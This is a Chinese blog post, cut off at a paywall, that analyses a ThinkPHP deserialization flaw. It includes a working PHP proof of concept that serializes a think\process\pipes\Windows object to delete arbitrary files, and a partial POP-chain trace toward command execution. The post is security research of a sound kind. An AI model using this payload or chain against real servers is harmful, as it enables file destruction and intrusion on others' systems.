ThinkPHP反序列化漏洞

已于 2023-05-19 00:02:06 修改
阅读量721 收藏 3
点赞数 2
文章标签: php 开发语言
于 2023-05-18 18:37:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2303_77642110/article/details/130752885
版权
文章详细分析了一个PHP框架中存在的安全漏洞,包括如何利用__destruct魔术方法实现任意文件删除,以及通过反序列化漏洞触发系统命令执行的可能路径。作者还探讨了如何构建POC来复现这些漏洞,并提到了非强制路由漏洞和利用Phar进行反序列化的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、任意文件删除

搜索__destruct魔术方法,找到四个,能利用的只有Windows.php中的魔术方法

public function __destruct()
    {
        $this->close();
        $this->removeFiles();
    }

 追踪removeFiles()

private function removeFiles()
    {
        foreach ($this->files as $filename) {
            if (file_exists($filename)) {
                @unlink($filename);
            }
        }
        $this->files = [];
    }

发现是一个删除文件的方法,并且参数可控,存在删除任意文件漏洞

POC:

<?php

namespace think\process\pipes;

class Pipes{

}

class Windows extends Pipes{
    private $files = ['/opt/lampp/htdocs/security/upload/shell.php'];
}

$file = new Windows();
echo urlencode(serialize($file));

二、反序列化漏洞

1、搜索关键函数destruct与wakeup两个反序列化一定会触发的魔术方法,wakeup需要进行反序列化时调用,所以先不考虑,搜索destruct,一共四个结果,而能利用的只有Windows.php

 继续追踪close(),发现没有利用点,返回来追踪removeFiles(),发现是删除文件的函数,但是file_exists接受的参数是一个字符串,所以查找__toString魔术方法,看看能不能触发,发现一共四处定义了该魔术方法

Paginator.php:

Collection.php:

input.php:

Conversion.php:

但可控点只有三处,排除input.php,剩下的三个继续追踪,Paginator.php追踪后没有发现可利用点,排除,继续追踪Collection.php发现也没有可利用点(至于为什么没有可利用点慢慢探究,锻炼自己的基本功,这里不做详细介绍)所以只剩Conversion.php

toJson->toArray,前面的没有可控点,直接来到下面,代码如下:

if (!empty($this->append)) {
            foreach ($this->append as $key => $name) {
                if (is_array($name)) {
                    // 追加关联对象属性
                    $relation = $this->getRelation($key);
                    if (!$relation) {
                        $relation = $this->getAttr($key);
                        $relation->visible($name);
                    }

                    $item[$key] = $relation->append($name)->toArray();

append为可控点,往下探查是否有利用点,追踪getRelation只是简单返回值,往下走,追踪getAttr,追踪getData,两条路有可控点:

public function getData($name = null)
最低0.47元/天 解锁文章
关注
漏洞复现】CVE-2024-44902 Thinkphp反序列化漏洞
总有人间一两风,填我十万八千梦
09-23 4069
Thinkphp v6.1.3至v8.0.4版本中存在反序列化漏洞,攻击者可利用此漏洞执行任意代码。
ThinkPHP 反序列化漏洞分析
IiwEngine的博客
09-17 281
反序列化漏洞是指攻击者能够在应用程序中执行恶意序列化数据的漏洞。当应用程序接受并反序列化未经充分验证的数据时,攻击者可以通过构造特定的序列化数据来执行任意代码,从而导致应用程序受到攻击。在早期版本的 ThinkPHP 中存在一个反序列化漏洞,该漏洞允许攻击者在应用程序中执行任意代码。通过加强安全意识和采取适当的安全措施,我们可以减少应用程序受到漏洞利用的风险,并确保网络环境的安全性。本文将详细分析 ThinkPHP 框架中的反序列化漏洞,并提供相应的源代码示例。是从用户输入中获取的序列化数据。
Thinkphp6 反序列化漏洞分析
无问社区的博客
08-22 1948
小编对Thinkphp6 反序列化漏洞的分析和自己的总结,全篇有点长,可以互相交流一下
【详细分析】thinkphp反序列化漏洞
记录学习,一起进步
06-26 1690
【详细分析】thinkphp反序列化漏洞
ThinkPHP反序列化漏洞分析一(后续已发)
没有网络安全就没有国家安全
03-06 1252
ThinkPHP反序列化漏洞分析一(后续已发)
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 940
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
全网最详细thinkPHP反序列化漏洞详解
kunkun_xiaomeng的博客
08-31 2130
thinkphp漏洞详解
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2539
Thinkphp6.0.x反序列化漏洞复现
thinkphp8反序列化分析
2301_79724395的博客
08-12 1047
摆了一个暑假,正好看见周会有人分析了tp反序列化,想起这条链子的发现者就是我尊敬的nivia,这不得好好分析一下,而且师傅也是分析了这个,所以有了这个文章。
ThinkPHP 5.1.X 反序列化漏洞:深入分析与利用技巧
weixin_43822401的博客
06-16 699
在Web应用开发中,框架的安全性至关重要。ThinkPHP作为广泛使用的PHP开发框架,其版本5.1.X中存在一个反序列化漏洞,允许攻击者执行任意代码。本文将深入分析该漏洞的原理、利用方法,并提供相应的防护措施。
代码审计-thinkphp 反序列化引起rce漏洞
gj204106的博客
10-09 661
目前的pop链:__destruct()->removefile()->file_exists()->__toString()->toJson()->toArray()->__call()->call_user_func_array()由上图代码可知,要满足date为数组,filter = $this->getFilter($filter, $default),发现filterValue()方法在input()方法里面,所以再跟踪谁调用了input()方法。此漏洞需要成品有涉及到反序列化
thinkphp5.0.24反序列化漏洞分析
热门推荐
Sk1y的博客
06-22 1万+
thinkphp5.0.24 反序列化漏洞分析 thinkphp5框架:thinkphp5的入口文件在,访问 写一个反序列化入口点全局搜索函数中的函数,调用了removeFiles()跟进removeFiles(),第163行的file_exists可以触发方法全局搜索在的第2265行,发现其调用了跟进,发现其调用了toArray()方法(在Model.php中)跟进,发现其有三处可以调用方法(就是整一个可以控制的类对象,然后让其调用该类不存在的方法,然后触发魔术方法)着重看第三处,...
ThinkPHP反序列化漏洞分析二
最新发布
没有网络安全就没有国家安全
03-06 890
ThinkPHP反序列化漏洞分析二
thinkphp漏洞_漏洞分析之thinkPHP反序列化:这就是黑客的世界吗
weixin_39715997的博客
11-21 403
前言作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去。只有赛后来查漏补缺了,也借着tp5.2这个反序列化pop链来学习下大佬们的构造思路,不得不说这个pop链真的是很强了,在分析的过程中,妈妈一直问我为什么跪着玩电脑~红帽杯2019 Ticket_System思路在直接输入xml数据处存在xxe...
ThinkPHP 5.0 低版本反序列化漏洞利用
weixin_46236101的博客
10-19 1234
前言 背景 日常渗透测试中,ThinkPHP低版本的站点虽然很少,但是总会有的,之前有大佬公开5.0.*的利用链,是适合中高版本的ThinkPHP框架,由于一些代码的改动,导致在某些地方并不能兼容所有的版本。 比如: 在5.0.16版本以下,HasOne类的getRelation的触发点removeWhereField方法未被调用。 在5.0.11版本以下,model类得三目运算符处的出发点不存在。 在5.0.4版本以下,触发的位置又有所不同。 本文将对已知反序列化利用链进行分析,并对比新老版本差异,构造
反序列化漏洞+ThinkPHP例工具使用+shiro例工具使用
NSQ0207的博客
08-03 828
在url栏上输入O:4:"Flag":1:{s:4:"file";protected属性被序列化后属性名长度会增加3,因为属性名会变成%00*%00属性名。private属性被序列化后属性名会变成%00类名%00属性名。O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示。这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面。s:4:"name" 字符串 属性值长度 属性值。运行11.php文件,获得序列化后的值。在vulhub文件内找到shiro漏洞
ThinkPHP v6.0.x 反序列化
Lethe's Blog
04-27 3589
0x01 环境搭建 使用composer进行安装: composer create-project topthink/think=6.0.x-dev TPv6.0 cd TPv6.0 php think run 定义入口文件app\controller\Index.php: <?php namespace app\controller; use app\BaseController; ...
我的ThinkPHP之旅:面对与解决反序列化漏洞的感悟
m0_60591287的博客
07-15 311
按理说应该是如此,我也加强了对框架的更新和维护,确保它能够及时修复可能存在的安全漏洞。但是,我也更加明白了安全在编程中的重要性。我坚持下来了,因为我知道,只有解决了这个问题,我的项目才能更加安全、稳定。反序列化漏洞,简单来说,就是攻击者可以通过构造恶意的序列化数据,来执行一些非法的操作。当我意识到这个问题时,我的项目已经部分完成,这意味着我需要重新检查并修改大量的代码。按理说应该是如此,我也查阅了大量的资料,寻找解决这个问题的方法。我相信,在我的努力下,我一定能够为用户带来更加安全、稳定的产品和服务。
ThinkPHP6反序列化漏洞核心原理
04-11
ThinkPHP6反序列化漏洞的核心原理是由于ThinkPHP6框架在处理反序列化时存在安全漏洞,攻击者可以构造恶意的序列化数据,通过该漏洞执行任意代码。具体原理如下: 1. ThinkPHP6框架使用了PHP的unserialize()函数来反序列化数据。攻击者可以构造恶意的序列化数据,其中包含可执行的代码。 2. 攻击者将恶意序列化数据发送给应用程序,应用程序在反序列化时会调用unserialize()函数。 3. unserialize()函数会将序列化数据还原为PHP对象。在这个过程中,如果恶意序列化数据中包含可执行的代码,那么这些代码就会被执行。 4. 攻击者可以通过构造恶意的序列化数据来执行任意代码,例如执行系统命令、读取敏感文件等。 为了防止这种漏洞的发生,开发者应该及时更新ThinkPHP6框架版本,以修复已知的安全漏洞。同时,也应该对用户输入进行严格的验证和过滤,避免恶意输入导致的安全问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值